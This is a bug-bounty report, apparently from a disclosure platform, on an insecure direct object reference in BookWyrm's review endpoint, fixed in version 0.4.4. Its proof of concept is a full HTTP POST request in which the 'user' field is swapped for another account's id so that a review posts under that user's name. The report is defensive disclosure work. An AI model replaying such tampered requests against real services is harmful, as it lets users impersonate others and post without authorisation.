Insecure direct object references in "review" function in bookwyrm-social/bookwyrm

Valid

Reported on

Jul 15th 2022

Description

Insecure direct object references in review a book function allows one user to create a comment on behalf of another.

Proof of Concept

POST /post/review HTTP/2
Host: book.dansmonorage.blue
Cookie: csrftoken=bYsdqkQkkbYXZYRVd8AynhYxG1rBb2AoOfAO76XCYmgzXK3A266EpZamGcKL0pN5; django_language=None; sessionid=yq7gxnp9ypxohws3mmh1h7mrgogg6xsz
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: application/json
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://book.dansmonorage.blue/
Content-Type: multipart/form-data; boundary=---------------------------269697065920795935563955484832
Content-Length: 1207
Origin: https://book.dansmonorage.blue
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Pwnfox-Color: green
Te: trailers

-----------------------------269697065920795935563955484832
Content-Disposition: form-data; name="csrfmiddlewaretoken"

EEplsmJEq47ABzhShOKjf4PAbhjHG2YohVxW98QW4fpczltx6MgphM1pbsCRvpb5
-----------------------------269697065920795935563955484832
Content-Disposition: form-data; name="book"

60596
-----------------------------269697065920795935563955484832
Content-Disposition: form-data; name="user"

6847 // change others id
-----------------------------269697065920795935563955484832
Content-Disposition: form-data; name="reply_parent"


-----------------------------269697065920795935563955484832
Content-Disposition: form-data; name="name"

From id 6847
-----------------------------269697065920795935563955484832
Content-Disposition: form-data; name="rating"


-----------------------------269697065920795935563955484832
Content-Disposition: form-data; name="content"

My book1 <h1>123</h1>
-----------------------------269697065920795935563955484832
Content-Disposition: form-data; name="content_warning"


-----------------------------269697065920795935563955484832
Content-Disposition: form-data; name="privacy"

public
-----------------------------269697065920795935563955484832--

Impact

This vulnerability is capable of allows a user to review a book on other users' accounts, affecting the logic of the application.

References

https://portswigger.net/web-security/access-control/idor

We are processing your report and will contact the bookwyrm-social/bookwyrm team within 24 hours. 10 months ago

Mouse Reeve validated this vulnerability 10 months ago

Nhien.IT has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

Mouse Reeve marked this as fixed in 0.4.4 with commit b66ce2 10 months ago

The fix bounty has been dropped

This vulnerability will not receive a CVE

Mouse Reeve gave praise 10 months ago

Thanks for catching these!

The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1

to join this conversation